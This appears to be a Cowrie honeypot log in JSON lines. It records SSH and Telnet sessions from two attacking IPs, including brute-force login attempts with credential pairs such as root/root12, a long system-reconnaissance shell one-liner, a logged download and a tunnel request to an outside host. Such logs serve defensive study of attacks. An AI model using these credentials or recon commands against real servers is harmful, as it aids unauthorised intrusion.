{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57174,"dst_ip":"1.2.3.4","dst_port":22,"session":"2209a8afd114","protocol":"ssh","message":"New connection: 212.227.235.229:57174 (1.2.3.4:22) [session: 2209a8afd114]","sensor":"my-vps","timestamp":"2025-08-26T20:33:45.820453Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T20:33:45.828616Z","src_ip":"212.227.235.229","session":"2209a8afd114"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T20:33:46.075871Z","src_ip":"212.227.235.229","session":"2209a8afd114"}
{"eventid":"cowrie.login.failed","username":"webmaster","password":"webmaster","message":"login attempt [webmaster/webmaster] failed","sensor":"my-vps","timestamp":"2025-08-26T20:33:47.075308Z","src_ip":"212.227.235.229","session":"2209a8afd114"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:33:48.329632Z","src_ip":"212.227.235.229","session":"2209a8afd114"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45652,"dst_ip":"1.2.3.4","dst_port":22,"session":"f3a41aba441e","protocol":"ssh","message":"New connection: 212.227.235.229:45652 (1.2.3.4:22) [session: f3a41aba441e]","sensor":"my-vps","timestamp":"2025-08-26T20:34:57.093613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:34:57.568458Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:34:59.225095Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56194,"dst_ip":"1.2.3.4","dst_port":22,"session":"a608a39695c5","protocol":"ssh","message":"New connection: 212.227.125.160:56194 (1.2.3.4:22) [session: a608a39695c5]","sensor":"my-vps","timestamp":"2025-08-26T20:34:59.230225Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:35:00.106803Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T20:35:00.107610Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.login.success","username":"root","password":"root12","message":"login attempt [root/root12] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:35:02.999817Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.login.success","username":"root","password":"root12","message":"login attempt [root/root12] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.392013Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:35:05.465938Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.466637Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.467417Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.468375Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.469409Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.470261Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.471611Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.472649Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.473228Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.473650Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.474037Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.474610Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:35:05.475141Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:35:06.718159Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.3","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:35:06.719082Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:35:06.720239Z","src_ip":"212.227.235.229","session":"f3a41aba441e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T20:35:07.645155Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","message":"CMD: uname=$(uname -s -v -n -m 2>/dev/null);; \t\tarch=$(uname -m 2>/dev/null);; \t\tuptime=$(awk '{u=int($1);d=int(u/86400);h=int((u%86400)/3600);m=int((u%3600)/60);s=\"\";if(d>0)s=s d\"d\";if(h>0){if(s!=\"\")s=s\", \";s=s h\"h\"}if(m>0||s==\"\"){if(s!=\"\")s=s\", \";s=s m\"m\"}print s}' /proc/uptime 2>/dev/null);; \t\t[ -z \"$uptime\" ] && secondsStr=$(cat /proc/uptime | cut -d' ' -f1 | cut -d. -f1) && [ -n \"$secondsStr\" ] && seconds=$((secondsStr)) && d=$((seconds/86400)) && h=$(( (seconds%86400)/3600 )) && m=$(( (seconds%3600)/60 )) && uptime=\"\" && [ $d -gt 0 ] && uptime=\"${uptime}${d}d\" && [ $h -gt 0 ] && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${h}h\"; } && { [ $m -gt 0 ] || [ -z \"$uptime\" ]; } && { [ -n \"$uptime\" ] && uptime=\"$uptime, \"; uptime=\"${uptime}${m}m\"; };; \t\tcpus=$( (nproc || grep -c \"^processor\" /proc/cpuinfo) 2>/dev/null | head -1);; \t\tcpu_model=$( (grep -m1 \"model name\" /proc/cpuinfo | cut -d: -f2 | sed 's/^ //;s/ *$//' || lscpu | grep -m1 \"Model name\" | cut -d: -f2 | sed 's/^ //;s/ *$//') 2>/dev/null);; \t\tgpu_info=$( (lspci | grep -i vga; lspci | grep -i nvidia) 2>/dev/null | head -n5);; \t\tcat_help=$((cat --help 2>&1 | tr '\\n' ' ') || cat --help 2>&1);; \t\tls_help=$((ls --help 2>&1 | tr '\\n' ' ') || ls --help 2>&1);; \t\tlast_output=$((last | tail -n 10) || last);; \t\techo \"UNAME:$uname\";; \t\techo \"ARCH:$arch\";; \t\techo \"UPTIME:$uptime\";; \t\techo \"CPUS:$cpus\";; \t\techo \"CPU_MODEL:$cpu_model\";; \t\techo \"GPU:$gpu_info\";; \t\techo \"CAT_HELP:$cat_help\";; \t\techo \"LS_HELP:$ls_help\";; \t\techo \"LAST:$last_output\";","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.645876Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -m 2 > /dev/null","message":"CMD: uname -s -v -n -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.646622Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"uname -m 2 > /dev/null","message":"CMD: uname -m 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.647599Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"awk {u=int($1","message":"CMD: awk {u=int($1","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.649150Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"CMD: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.649839Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.failed","input":"cat /proc/uptime | cut -d -f1 | cut -d. -f1","message":"Command not found: cat /proc/uptime | cut -d -f1 | cut -d. -f1","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.650547Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"(secondsStr","message":"CMD: (secondsStr","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.651792Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"(seconds/86400","message":"CMD: (seconds/86400","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.652415Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"( (seconds%86400","message":"CMD: ( (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.653113Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"(seconds%86400","message":"CMD: (seconds%86400","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.653589Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"( (seconds%3600","message":"CMD: ( (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.654211Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.command.input","input":"(seconds%3600","message":"CMD: (seconds%3600","sensor":"my-vps","timestamp":"2025-08-26T20:35:07.654902Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","shasum":"1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","destfile":"/dev/null","message":"Saved redir contents with SHA-256 1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057 to var/lib/cowrie/downloads/1b20a210fe96e5a8abc347dfb91d7befecb4b5f9b7ed40d856410fac15952057","sensor":"my-vps","timestamp":"2025-08-26T20:35:08.595922Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","size":74,"shasum":"ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c","duplicate":true,"duration":"1.0","message":"Closing TTY Log: var/lib/cowrie/tty/ca88d8e2c0cfe079cce0e55390ff79932c81d831016d8b2dfa21f7db9a052f8c after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:35:08.597034Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:35:08.690267Z","src_ip":"212.227.125.160","session":"a608a39695c5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41167,"dst_ip":"1.2.3.4","dst_port":22,"session":"43b09328cd69","protocol":"ssh","message":"New connection: 212.227.235.229:41167 (1.2.3.4:22) [session: 43b09328cd69]","sensor":"my-vps","timestamp":"2025-08-26T20:35:25.108703Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T20:35:25.109688Z","src_ip":"212.227.235.229","session":"43b09328cd69"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41499,"dst_ip":"1.2.3.4","dst_port":22,"session":"a68528a8a4f7","protocol":"ssh","message":"New connection: 212.227.235.229:41499 (1.2.3.4:22) [session: a68528a8a4f7]","sensor":"my-vps","timestamp":"2025-08-26T20:35:25.289690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T20:35:25.291172Z","src_ip":"212.227.235.229","session":"a68528a8a4f7"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T20:35:25.451576Z","src_ip":"212.227.235.229","session":"a68528a8a4f7"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T20:35:25.935905Z","src_ip":"212.227.235.229","session":"a68528a8a4f7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T20:35:26.097521Z","session":"a68528a8a4f7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34006,"dst_ip":"1.2.3.4","dst_port":23,"session":"266fe721f501","protocol":"telnet","message":"New connection: 212.227.125.160:34006 (1.2.3.4:23) [session: 266fe721f501]","sensor":"my-vps","timestamp":"2025-08-26T20:35:39.230628Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53990,"dst_ip":"1.2.3.4","dst_port":22,"session":"0349e11678f9","protocol":"ssh","message":"New connection: 212.227.235.229:53990 (1.2.3.4:22) [session: 0349e11678f9]","sensor":"my-vps","timestamp":"2025-08-26T20:35:42.973847Z"}
